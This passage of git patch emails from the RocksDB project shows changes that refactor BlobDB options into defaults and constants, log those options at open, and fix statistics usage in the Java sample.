Closes https://github.com/facebook/rocksdb/pull/2634 Differential Revision: D5530722 Pulled By: siying fbshipit-source-id: 425ab55bca5967110377d634258360bcf88c200e --- db/compaction.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/db/compaction.cc b/db/compaction.cc index ea2c011a45c..31adcc29de4 100644 --- a/db/compaction.cc +++ b/db/compaction.cc @@ -169,6 +169,7 @@ Compaction::Compaction(VersionStorageInfo* vstorage, bottommost_level_(IsBottommostLevel(output_level_, vstorage, inputs_)), is_full_compaction_(IsFullCompaction(vstorage, inputs_)), is_manual_compaction_(_manual_compaction), + is_trivial_move_(false), compaction_reason_(_compaction_reason) { MarkFilesBeingCompacted(true); if (is_manual_compaction_) { From 1900771bd29ca37b4d41d4ee59c2de3ae95526ef Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 1 Aug 2017 12:48:22 -0700 Subject: [PATCH 066/205] Dump Blob DB options to info log Summary: * Dump blob db options to info log * Remove BlobDBOptionsImpl to disallow dynamic cast *BlobDBOptions into *BlobDBOptionsImpl. Move options there to be constants or into BlobDBOptions. The dynamic cast is broken after #2645 * Change some of the default options * Remove blob_db_options.min_blob_size, which is unimplemented. Will implement it soon. Closes https://github.com/facebook/rocksdb/pull/2671 Differential Revision: D5529912 Pulled By: yiwu-arbug fbshipit-source-id: dcd58ca981db5bcc7f123b65a0d6f6ae0dc703c7 --- CMakeLists.txt | 1 - TARGETS | 1 - src.mk | 1 - tools/db_bench_tool.cc | 5 +- utilities/blob_db/blob_db.cc | 85 +++++++++++++++-------- utilities/blob_db/blob_db.h | 32 ++++----- utilities/blob_db/blob_db_impl.cc | 50 +++++-------- utilities/blob_db/blob_db_impl.h | 48 ++++++++++++- utilities/blob_db/blob_db_options_impl.cc | 69 ------------------ utilities/blob_db/blob_db_options_impl.h | 76 -------------------- utilities/blob_db/blob_db_test.cc | 31 ++++----- 11 files changed, 151 insertions(+), 248 deletions(-) delete mode 100644 utilities/blob_db/blob_db_options_impl.cc delete mode 100644 utilities/blob_db/blob_db_options_impl.h diff --git a/CMakeLists.txt b/CMakeLists.txt index 00756e8e3ad..bc8eb5d6152 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -476,7 +476,6 @@ set(SOURCES utilities/backupable/backupable_db.cc utilities/blob_db/blob_db.cc utilities/blob_db/blob_db_impl.cc - utilities/blob_db/blob_db_options_impl.cc utilities/blob_db/blob_dump_tool.cc utilities/blob_db/blob_file.cc utilities/blob_db/blob_log_reader.cc diff --git a/TARGETS b/TARGETS index 525e5d38bc0..f2aa661f38f 100644 --- a/TARGETS +++ b/TARGETS @@ -206,7 +206,6 @@ cpp_library( "utilities/backupable/backupable_db.cc", "utilities/blob_db/blob_db.cc", "utilities/blob_db/blob_db_impl.cc", - "utilities/blob_db/blob_db_options_impl.cc", "utilities/blob_db/blob_file.cc", "utilities/blob_db/blob_log_reader.cc", "utilities/blob_db/blob_log_writer.cc", diff --git a/src.mk b/src.mk index 014287ce0a5..81d78eb36fb 100644 --- a/src.mk +++ b/src.mk @@ -154,7 +154,6 @@ LIB_SOURCES = \ utilities/backupable/backupable_db.cc \ utilities/blob_db/blob_db.cc \ utilities/blob_db/blob_db_impl.cc \ - utilities/blob_db/blob_db_options_impl.cc \ utilities/blob_db/blob_file.cc \ utilities/blob_db/blob_log_reader.cc \ utilities/blob_db/blob_log_writer.cc \ diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index a1c6af0290d..8f3ae353684 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -3311,10 +3311,7 @@ void VerifyDBFromDB(std::string& truth_db_name) { } else if (FLAGS_use_blob_db) { 
blob_db::BlobDBOptions blob_db_options; blob_db::BlobDB* ptr; - s = CreateLoggerFromOptions(db_name, options, &options.info_log); - if (s.ok()) { - s = blob_db::BlobDB::Open(options, blob_db_options, db_name, &ptr); - } + s = blob_db::BlobDB::Open(options, blob_db_options, db_name, &ptr); if (s.ok()) { db->db = ptr; } diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc index ea60ad59b47..4f95b61f284 100644 --- a/utilities/blob_db/blob_db.cc +++ b/utilities/blob_db/blob_db.cc @@ -5,7 +5,14 @@ // #ifndef ROCKSDB_LITE +#ifndef __STDC_FORMAT_MACROS +#define __STDC_FORMAT_MACROS +#endif + #include "utilities/blob_db/blob_db.h" + +#include + #include "db/write_batch_internal.h" #include "monitoring/instrumented_mutex.h" #include "options/cf_options.h" @@ -94,23 +101,31 @@ Status BlobDB::Open(const Options& options, const BlobDBOptions& bdb_options, return s; } -Status BlobDB::Open(const DBOptions& db_options, +Status BlobDB::Open(const DBOptions& db_options_input, const BlobDBOptions& bdb_options, const std::string& dbname, const std::vector& column_families, std::vector* handles, BlobDB** blob_db, bool no_base_db) { *blob_db = nullptr; + Status s; + + DBOptions db_options(db_options_input); + if (db_options.info_log == nullptr) { + s = CreateLoggerFromOptions(dbname, db_options, &db_options.info_log); + if (!s.ok()) { + return s; + } + } - DBOptions my_db_options(db_options); FlushBeginListener_t fblistener = std::make_shared(); CompactionListener_t ce_listener = std::make_shared(); ReconcileWalFilter_t rw_filter = std::make_shared(); - my_db_options.listeners.emplace_back(fblistener); - my_db_options.listeners.emplace_back(ce_listener); - my_db_options.wal_filter = rw_filter.get(); + db_options.listeners.emplace_back(fblistener); + db_options.listeners.emplace_back(ce_listener); + db_options.wal_filter = rw_filter.get(); { MutexLock l(&listener_mutex); @@ -120,19 +135,25 @@ Status BlobDB::Open(const DBOptions& db_options, } // we need to open blob db first so that recovery can happen - BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, my_db_options); + BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, db_options); fblistener->SetImplPtr(bdb); ce_listener->SetImplPtr(bdb); rw_filter->SetImplPtr(bdb); - Status s = bdb->OpenPhase1(); - if (!s.ok()) return s; + s = bdb->OpenPhase1(); + if (!s.ok()) { + return s; + } - if (no_base_db) return s; + if (no_base_db) { + return s; + } DB* db = nullptr; - s = DB::Open(my_db_options, dbname, column_families, handles, &db); - if (!s.ok()) return s; + s = DB::Open(db_options, dbname, column_families, handles, &db); + if (!s.ok()) { + return s; + } // set the implementation pointer s = bdb->LinkToBaseDB(db); @@ -141,28 +162,36 @@ Status BlobDB::Open(const DBOptions& db_options, bdb = nullptr; } *blob_db = bdb; + bdb_options.Dump(db_options.info_log.get()); return s; } BlobDB::BlobDB(DB* db) : StackableDB(db) {} -//////////////////////////////////////////////////////////////////////////////// -// -// -// std::function fnCaller = -// std::bind(&A::fn, &anInstance, std::placeholders::_1); -//////////////////////////////////////////////////////////////////////////////// -BlobDBOptions::BlobDBOptions() - : blob_dir("blob_dir"), - path_relative(true), - is_fifo(false), - blob_dir_size(1000ULL * 1024ULL * 1024ULL * 1024ULL), - ttl_range_secs(3600), - min_blob_size(512), - bytes_per_sync(0), - blob_file_size(256 * 1024 * 1024), - num_concurrent_simple_blobs(4), - compression(kNoCompression) {} +void BlobDBOptions::Dump(Logger* log) const 
{ + ROCKS_LOG_HEADER(log, " blob_db_options.blob_dir: %s", + blob_dir.c_str()); + ROCKS_LOG_HEADER(log, " blob_db_options.path_relative: %d", + path_relative); + ROCKS_LOG_HEADER(log, " blob_db_options.is_fifo: %d", + is_fifo); + ROCKS_LOG_HEADER(log, " blob_db_options.blob_dir_size: %" PRIu64, + blob_dir_size); + ROCKS_LOG_HEADER(log, " blob_db_options.ttl_range_secs: %" PRIu32, + ttl_range_secs); + ROCKS_LOG_HEADER(log, " blob_db_options.bytes_per_sync: %" PRIu64, + bytes_per_sync); + ROCKS_LOG_HEADER(log, " blob_db_options.blob_file_size: %" PRIu64, + blob_file_size); + ROCKS_LOG_HEADER(log, "blob_db_options.num_concurrent_simple_blobs: %" PRIu32, + num_concurrent_simple_blobs); + ROCKS_LOG_HEADER(log, " blob_db_options.ttl_extractor: %p", + ttl_extractor.get()); + ROCKS_LOG_HEADER(log, " blob_db_options.compression: %d", + static_cast(compression)); + ROCKS_LOG_HEADER(log, " blob_db_options.disable_background_tasks: %d", + disable_background_tasks); +} } // namespace blob_db } // namespace rocksdb diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index e68b40a0ac7..b645ea6efdd 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -31,18 +31,18 @@ class TTLExtractor; struct BlobDBOptions { // name of the directory under main db, where blobs will be stored. // default is "blob_dir" - std::string blob_dir; + std::string blob_dir = "blob_dir"; // whether the blob_dir path is relative or absolute. - bool path_relative; + bool path_relative = true; // is the eviction strategy fifo based - bool is_fifo; + bool is_fifo = false; // maximum size of the blob dir. Once this gets used, up // evict the blob file which is oldest (is_fifo ) // 0 means no limits - uint64_t blob_dir_size; + uint64_t blob_dir_size = 0; // a new bucket is opened, for ttl_range. So if ttl_range is 600seconds // (10 minutes), and the first bucket starts at 1471542000 @@ -50,26 +50,22 @@ struct BlobDBOptions { // first bucket is 1471542000 - 1471542600 // second bucket is 1471542600 - 1471543200 // and so on - uint32_t ttl_range_secs; - - // at what size will the blobs be stored in separate log rather than - // inline - uint64_t min_blob_size; + uint32_t ttl_range_secs = 3600; // at what bytes will the blob files be synced to blob log. - uint64_t bytes_per_sync; + uint64_t bytes_per_sync = 0; // the target size of each blob file. File will become immutable // after it exceeds that size - uint64_t blob_file_size; + uint64_t blob_file_size = 256 * 1024 * 1024; // how many files to use for simple blobs at one time - uint32_t num_concurrent_simple_blobs; + uint32_t num_concurrent_simple_blobs = 1; // Instead of setting TTL explicitly by calling PutWithTTL or PutUntil, // applications can set a TTLExtractor which can extract TTL from key-value // pairs. - std::shared_ptr ttl_extractor; + std::shared_ptr ttl_extractor = nullptr; // eviction callback. // this function will be called for every blob that is getting @@ -78,14 +74,12 @@ struct BlobDBOptions { gc_evict_cb_fn; // what compression to use for Blob's - CompressionType compression; - - // default constructor - BlobDBOptions(); + CompressionType compression = kNoCompression; - BlobDBOptions(const BlobDBOptions& in) = default; + // Disable all background job. 
+ bool disable_background_tasks = false; - virtual ~BlobDBOptions() = default; + void Dump(Logger* log) const; }; class BlobDB : public StackableDB { diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index f55566fd425..0488d99242a 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -199,12 +199,6 @@ BlobDBImpl::BlobDBImpl(const std::string& dbname, total_blob_space_(0), open_p1_done_(false), debug_level_(0) { - const BlobDBOptionsImpl* options_impl = - static_cast_with_check( - &blob_db_options); - if (options_impl) { - bdb_options_ = *options_impl; - } blob_dir_ = (bdb_options_.path_relative) ? dbname + "/" + bdb_options_.blob_dir : bdb_options_.blob_dir; @@ -263,12 +257,6 @@ BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) total_periods_write_(0), total_periods_ampl_(0), total_blob_space_(0) { - assert(db_impl_ != nullptr); - const BlobDBOptionsImpl* options_impl = - static_cast_with_check( - &blob_db_options); - bdb_options_ = *options_impl; - if (!bdb_options_.blob_dir.empty()) blob_dir_ = (bdb_options_.path_relative) ? db_->GetName() + "/" + bdb_options_.blob_dir @@ -304,27 +292,27 @@ Status BlobDBImpl::OpenPhase1() { void BlobDBImpl::StartBackgroundTasks() { // store a call to a member function and object tqueue_.add( - bdb_options_.reclaim_of_period_millisecs, + kReclaimOpenFilesPeriodMillisecs, std::bind(&BlobDBImpl::ReclaimOpenFiles, this, std::placeholders::_1)); - tqueue_.add(bdb_options_.gc_check_period_millisecs, + tqueue_.add(kGCCheckPeriodMillisecs, std::bind(&BlobDBImpl::RunGC, this, std::placeholders::_1)); tqueue_.add( - bdb_options_.deletion_check_period_millisecs, + kDeleteCheckPeriodMillisecs, std::bind(&BlobDBImpl::EvictDeletions, this, std::placeholders::_1)); tqueue_.add( - bdb_options_.deletion_check_period_millisecs, + kDeleteCheckPeriodMillisecs, std::bind(&BlobDBImpl::EvictCompacted, this, std::placeholders::_1)); tqueue_.add( - bdb_options_.delete_obsf_period_millisecs, + kDeleteObsoletedFilesPeriodMillisecs, std::bind(&BlobDBImpl::DeleteObsFiles, this, std::placeholders::_1)); - tqueue_.add(bdb_options_.sanity_check_period_millisecs, + tqueue_.add(kSanityCheckPeriodMillisecs, std::bind(&BlobDBImpl::SanityCheck, this, std::placeholders::_1)); - tqueue_.add(bdb_options_.wa_stats_period_millisecs, + tqueue_.add(kWriteAmplificationStatsPeriodMillisecs, std::bind(&BlobDBImpl::WaStats, this, std::placeholders::_1)); - tqueue_.add(bdb_options_.fsync_files_period_millisecs, + tqueue_.add(kFSyncFilesPeriodMillisecs, std::bind(&BlobDBImpl::FsyncFiles, this, std::placeholders::_1)); tqueue_.add( - bdb_options_.check_seqf_period_millisecs, + kCheckSeqFilesPeriodMillisecs, std::bind(&BlobDBImpl::CheckSeqFiles, this, std::placeholders::_1)); } @@ -1606,8 +1594,9 @@ std::pair BlobDBImpl::FsyncFiles(bool aborted) { std::pair BlobDBImpl::ReclaimOpenFiles(bool aborted) { if (aborted) return std::make_pair(false, -1); - if (open_file_count_.load() < bdb_options_.open_files_trigger) + if (open_file_count_.load() < kOpenFilesTrigger) { return std::make_pair(true, -1); + } // in the future, we should sort by last_access_ // instead of closing every file @@ -1628,7 +1617,7 @@ std::pair BlobDBImpl::WaStats(bool aborted) { WriteLock wl(&mutex_); - if (all_periods_write_.size() < bdb_options_.wa_num_stats_periods) { + if (all_periods_write_.size() < kWriteAmplificationStatsPeriods) { total_periods_write_ -= (*all_periods_write_.begin()); total_periods_ampl_ = (*all_periods_ampl_.begin()); @@ 
-1868,15 +1857,14 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, std::time_t tt, return true; } - if (bdb_options_.ttl_range_secs < - bdb_options_.partial_expiration_gc_range_secs) { + if (bdb_options_.ttl_range_secs < kPartialExpirationGCRangeSecs) { *reason = "has ttl but partial expiration not turned on"; return false; } ReadLock lockbfile_r(&bfile->mutex_); bool ret = ((bfile->deleted_size_ * 100.0 / bfile->file_size_.load()) > - bdb_options_.partial_expiration_pct); + kPartialExpirationPercentage); if (ret) { *reason = "deleted blobs beyond threshold"; } else { @@ -1895,13 +1883,14 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, std::time_t tt, ReadLock lockbfile_r(&bfile->mutex_); if ((bfile->deleted_size_ * 100.0 / bfile->file_size_.load()) > - bdb_options_.partial_expiration_pct) { + kPartialExpirationPercentage) { *reason = "deleted simple blobs beyond threshold"; return true; } // if we haven't reached limits of disk space, don't DELETE - if (total_blob_space_.load() < bdb_options_.blob_dir_size) { + if (bdb_options_.blob_dir_size == 0 || + total_blob_space_.load() < bdb_options_.blob_dir_size) { *reason = "disk space not exceeded"; return false; } @@ -2057,7 +2046,7 @@ void BlobDBImpl::FilterSubsetOfFiles( uint64_t last_id, size_t files_to_collect) { // 100.0 / 15.0 = 7 uint64_t next_epoch_increment = static_cast( - std::ceil(100 / static_cast(bdb_options_.gc_file_pct))); + std::ceil(100 / static_cast(kGCFilePercentage))); std::chrono::system_clock::time_point now = std::chrono::system_clock::now(); std::time_t tt = std::chrono::system_clock::to_time_t(now); @@ -2114,8 +2103,7 @@ std::pair BlobDBImpl::RunGC(bool aborted) { // 15% of files are collected each call to space out the IO and CPU // consumption. - size_t files_to_collect = - (bdb_options_.gc_file_pct * blob_files.size()) / 100; + size_t files_to_collect = (kGCFilePercentage * blob_files.size()) / 100; std::vector> to_process; FilterSubsetOfFiles(blob_files, &to_process, current_epoch_, last_id, diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 8da5bbf6529..95a387afe37 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -29,7 +29,6 @@ #include "util/mutexlock.h" #include "util/timer_queue.h" #include "utilities/blob_db/blob_db.h" -#include "utilities/blob_db/blob_db_options_impl.h" #include "utilities/blob_db/blob_log_format.h" #include "utilities/blob_db/blob_log_reader.h" #include "utilities/blob_db/blob_log_writer.h" @@ -158,6 +157,51 @@ class BlobDBImpl : public BlobDB { friend class BlobDBIterator; public: + // deletions check period + static constexpr uint32_t kDeleteCheckPeriodMillisecs = 2 * 1000; + + // gc percentage each check period + static constexpr uint32_t kGCFilePercentage = 100; + + // gc period + static constexpr uint32_t kGCCheckPeriodMillisecs = 60 * 1000; + + // sanity check task + static constexpr uint32_t kSanityCheckPeriodMillisecs = 20 * 60 * 1000; + + // how many random access open files can we tolerate + static constexpr uint32_t kOpenFilesTrigger = 100; + + // how many periods of stats do we keep. + static constexpr uint32_t kWriteAmplificationStatsPeriods = 24; + + // what is the length of any period + static constexpr uint32_t kWriteAmplificationStatsPeriodMillisecs = + 3600 * 1000; + + // we will garbage collect blob files in + // which entire files have expired. 
However if the + // ttl_range of files is very large say a day, we + // would have to wait for the entire day, before we + // recover most of the space. + static constexpr uint32_t kPartialExpirationGCRangeSecs = 4 * 3600; + + // this should be based on allowed Write Amplification + // if 50% of the space of a blob file has been deleted/expired, + static constexpr uint32_t kPartialExpirationPercentage = 75; + + // how often should we schedule a job to fsync open files + static constexpr uint32_t kFSyncFilesPeriodMillisecs = 10 * 1000; + + // how often to schedule reclaim open files. + static constexpr uint32_t kReclaimOpenFilesPeriodMillisecs = 1 * 1000; + + // how often to schedule delete obs files periods + static constexpr uint32_t kDeleteObsoletedFilesPeriodMillisecs = 10 * 1000; + + // how often to schedule check seq files period + static constexpr uint32_t kCheckSeqFilesPeriodMillisecs = 10 * 1000; + static constexpr uint64_t kNoExpiration = std::numeric_limits::max(); @@ -383,7 +427,7 @@ class BlobDBImpl : public BlobDB { WriteOptions write_options_; // the options that govern the behavior of Blob Storage - BlobDBOptionsImpl bdb_options_; + BlobDBOptions bdb_options_; DBOptions db_options_; EnvOptions env_options_; diff --git a/utilities/blob_db/blob_db_options_impl.cc b/utilities/blob_db/blob_db_options_impl.cc deleted file mode 100644 index 263213d8e34..00000000000 --- a/utilities/blob_db/blob_db_options_impl.cc +++ /dev/null @@ -1,69 +0,0 @@ -// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under both the GPLv2 (found in the -// COPYING file in the root directory) and Apache 2.0 License -// (found in the LICENSE.Apache file in the root directory). -#ifndef ROCKSDB_LITE - -#include "utilities/blob_db/blob_db_options_impl.h" - -namespace rocksdb { - -namespace blob_db { - -BlobDBOptionsImpl::BlobDBOptionsImpl(const BlobDBOptions& in) - : BlobDBOptions(in), - deletion_check_period_millisecs(2 * 1000), - gc_file_pct(20), - gc_check_period_millisecs(60 * 1000), - sanity_check_period_millisecs(20 * 60 * 1000), - open_files_trigger(100), - wa_num_stats_periods(24), - wa_stats_period_millisecs(3600 * 1000), - partial_expiration_gc_range_secs(4 * 3600), - partial_expiration_pct(75), - fsync_files_period_millisecs(10 * 1000), - reclaim_of_period_millisecs(1 * 1000), - delete_obsf_period_millisecs(10 * 1000), - check_seqf_period_millisecs(10 * 1000), - disable_background_tasks(false) {} - -BlobDBOptionsImpl::BlobDBOptionsImpl() - : deletion_check_period_millisecs(2 * 1000), - gc_file_pct(20), - gc_check_period_millisecs(60 * 1000), - sanity_check_period_millisecs(20 * 60 * 1000), - open_files_trigger(100), - wa_num_stats_periods(24), - wa_stats_period_millisecs(3600 * 1000), - partial_expiration_gc_range_secs(4 * 3600), - partial_expiration_pct(75), - fsync_files_period_millisecs(10 * 1000), - reclaim_of_period_millisecs(1 * 1000), - delete_obsf_period_millisecs(10 * 1000), - check_seqf_period_millisecs(10 * 1000), - disable_background_tasks(false) {} - -BlobDBOptionsImpl& BlobDBOptionsImpl::operator=(const BlobDBOptionsImpl& in) { - BlobDBOptions::operator=(in); - if (this != &in) { - deletion_check_period_millisecs = in.deletion_check_period_millisecs; - gc_file_pct = in.gc_file_pct; - gc_check_period_millisecs = in.gc_check_period_millisecs; - sanity_check_period_millisecs = in.sanity_check_period_millisecs; - open_files_trigger = in.open_files_trigger; - wa_num_stats_periods = in.wa_num_stats_periods; - wa_stats_period_millisecs = 
in.wa_stats_period_millisecs; - partial_expiration_gc_range_secs = in.partial_expiration_gc_range_secs; - partial_expiration_pct = in.partial_expiration_pct; - fsync_files_period_millisecs = in.fsync_files_period_millisecs; - reclaim_of_period_millisecs = in.reclaim_of_period_millisecs; - delete_obsf_period_millisecs = in.delete_obsf_period_millisecs; - check_seqf_period_millisecs = in.check_seqf_period_millisecs; - disable_background_tasks = in.disable_background_tasks; - } - return *this; -} - -} // namespace blob_db -} // namespace rocksdb -#endif // ROCKSDB_LITE diff --git a/utilities/blob_db/blob_db_options_impl.h b/utilities/blob_db/blob_db_options_impl.h deleted file mode 100644 index 0ee0aa92005..00000000000 --- a/utilities/blob_db/blob_db_options_impl.h +++ /dev/null @@ -1,76 +0,0 @@ -// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under both the GPLv2 (found in the -// COPYING file in the root directory) and Apache 2.0 License -// (found in the LICENSE.Apache file in the root directory). - -#pragma once - -#ifndef ROCKSDB_LITE - -#include "utilities/blob_db/blob_db.h" - -namespace rocksdb { - -namespace blob_db { - -struct BlobDBOptionsImpl : public BlobDBOptions { - // deletions check period - uint32_t deletion_check_period_millisecs; - - // gc percentage each check period - uint32_t gc_file_pct; - - // gc period - uint32_t gc_check_period_millisecs; - - // sanity check task - uint32_t sanity_check_period_millisecs; - - // how many random access open files can we tolerate - uint32_t open_files_trigger; - - // how many periods of stats do we keep. - uint32_t wa_num_stats_periods; - - // what is the length of any period - uint32_t wa_stats_period_millisecs; - - // we will garbage collect blob files in - // which entire files have expired. However if the - // ttl_range of files is very large say a day, we - // would have to wait for the entire day, before we - // recover most of the space. - uint32_t partial_expiration_gc_range_secs; - - // this should be based on allowed Write Amplification - // if 50% of the space of a blob file has been deleted/expired, - uint32_t partial_expiration_pct; - - // how often should we schedule a job to fsync open files - uint32_t fsync_files_period_millisecs; - - // how often to schedule reclaim open files. - uint32_t reclaim_of_period_millisecs; - - // how often to schedule delete obs files periods - uint32_t delete_obsf_period_millisecs; - - // how often to schedule check seq files period - uint32_t check_seqf_period_millisecs; - - // Disable all background job. 
- bool disable_background_tasks; - - // default constructor - BlobDBOptionsImpl(); - - explicit BlobDBOptionsImpl(const BlobDBOptions& in); - - BlobDBOptionsImpl& operator=(const BlobDBOptionsImpl& in); -}; - -} // namespace blob_db - -} // namespace rocksdb - -#endif // endif ROCKSDB diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 6a43f6b77e9..a5f9795929f 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -16,7 +16,6 @@ #include "util/string_util.h" #include "util/testharness.h" #include "utilities/blob_db/blob_db_impl.h" -#include "utilities/blob_db/blob_db_options_impl.h" namespace rocksdb { namespace blob_db { @@ -47,7 +46,7 @@ class BlobDBTest : public testing::Test { ~BlobDBTest() { Destroy(); } - void Open(BlobDBOptionsImpl bdb_options = BlobDBOptionsImpl(), + void Open(BlobDBOptions bdb_options = BlobDBOptions(), Options options = Options()) { options.create_if_missing = true; ASSERT_OK(BlobDB::Open(options, bdb_options, dbname_, &blob_db_)); @@ -153,7 +152,7 @@ class BlobDBTest : public testing::Test { TEST_F(BlobDBTest, Put) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -167,7 +166,7 @@ TEST_F(BlobDBTest, PutWithTTL) { Random rnd(301); Options options; options.env = mock_env_.get(); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.disable_background_tasks = true; @@ -196,7 +195,7 @@ TEST_F(BlobDBTest, PutUntil) { Random rnd(301); Options options; options.env = mock_env_.get(); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.disable_background_tasks = true; @@ -227,7 +226,7 @@ TEST_F(BlobDBTest, TTLExtrator_NoTTL) { Random rnd(301); Options options; options.env = mock_env_.get(); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.num_concurrent_simple_blobs = 1; @@ -275,7 +274,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { ttl_extractor_.reset(new TestTTLExtractor(&rnd)); Options options; options.env = mock_env_.get(); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.ttl_extractor = ttl_extractor_; @@ -322,7 +321,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { ttl_extractor_.reset(new TestTTLExtractor(&rnd)); Options options; options.env = mock_env_.get(); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.ttl_extractor = ttl_extractor_; @@ -369,7 +368,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { Random rnd(301); Options options; options.env = mock_env_.get(); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.ttl_extractor = std::make_shared(); @@ -404,7 +403,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { TEST_F(BlobDBTest, StackableDBGet) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -426,7 +425,7 @@ 
TEST_F(BlobDBTest, StackableDBGet) { TEST_F(BlobDBTest, WriteBatch) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -442,7 +441,7 @@ TEST_F(BlobDBTest, WriteBatch) { TEST_F(BlobDBTest, Delete) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -457,7 +456,7 @@ TEST_F(BlobDBTest, Delete) { TEST_F(BlobDBTest, DeleteBatch) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); for (size_t i = 0; i < 100; i++) { @@ -474,7 +473,7 @@ TEST_F(BlobDBTest, DeleteBatch) { TEST_F(BlobDBTest, Override) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -491,7 +490,7 @@ TEST_F(BlobDBTest, Override) { #ifdef SNAPPY TEST_F(BlobDBTest, Compression) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; bdb_options.compression = CompressionType::kSnappyCompression; Open(bdb_options); @@ -528,7 +527,7 @@ TEST_F(BlobDBTest, DISABLED_MultipleWriters) { // Test sequence number store in blob file is correct. TEST_F(BlobDBTest, SequenceNumber) { Random rnd(301); - BlobDBOptionsImpl bdb_options; + BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); SequenceNumber sequence = blob_db_->GetLatestSequenceNumber(); From 3453870677ee2648f38d70fe8aa7fa16a93a96d2 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Tue, 1 Aug 2017 16:42:42 -0700 Subject: [PATCH 067/205] Fix statistics in RocksJava sample Summary: I observed while doing a `make jtest` that the java sample was broken, due to the changes in #2551 . 
Closes https://github.com/facebook/rocksdb/pull/2674 Differential Revision: D5539807 Pulled By: sagar0 fbshipit-source-id: 2c7e9d84778099dfa1c611996b444efe3c9fd466 --- java/samples/src/main/java/RocksDBSample.java | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/java/samples/src/main/java/RocksDBSample.java b/java/samples/src/main/java/RocksDBSample.java index b1f9805553d..f61995ed98f 100644 --- a/java/samples/src/main/java/RocksDBSample.java +++ b/java/samples/src/main/java/RocksDBSample.java @@ -31,6 +31,7 @@ public static void main(final String[] args) { final Filter bloomFilter = new BloomFilter(10); final ReadOptions readOptions = new ReadOptions() .setFillCache(false); + final Statistics stats = new Statistics(); final RateLimiter rateLimiter = new RateLimiter(10000000,10000, 10)) { try (final RocksDB db = RocksDB.open(options, db_path_not_found)) { @@ -41,7 +42,7 @@ public static void main(final String[] args) { try { options.setCreateIfMissing(true) - .createStatistics() + .setStatistics(stats) .setWriteBufferSize(8 * SizeUnit.KB) .setMaxWriteBufferNumber(3) .setMaxBackgroundCompactions(10) @@ -51,8 +52,6 @@ public static void main(final String[] args) { assert (false); } - final Statistics stats = options.statisticsPtr(); - assert (options.createIfMissing() == true); assert (options.writeBufferSize() == 8 * SizeUnit.KB); assert (options.maxWriteBufferNumber() == 3); @@ -221,7 +220,9 @@ public static void main(final String[] args) { try { for (final TickerType statsType : TickerType.values()) { - stats.getTickerCount(statsType); + if (statsType != TickerType.TICKER_ENUM_MAX) { + stats.getTickerCount(statsType); + } } System.out.println("getTickerCount() passed."); } catch (final Exception e) { @@ -231,7 +232,9 @@ public static void main(final String[] args) { try { for (final HistogramType histogramType : HistogramType.values()) { - HistogramData data = stats.getHistogramData(histogramType); 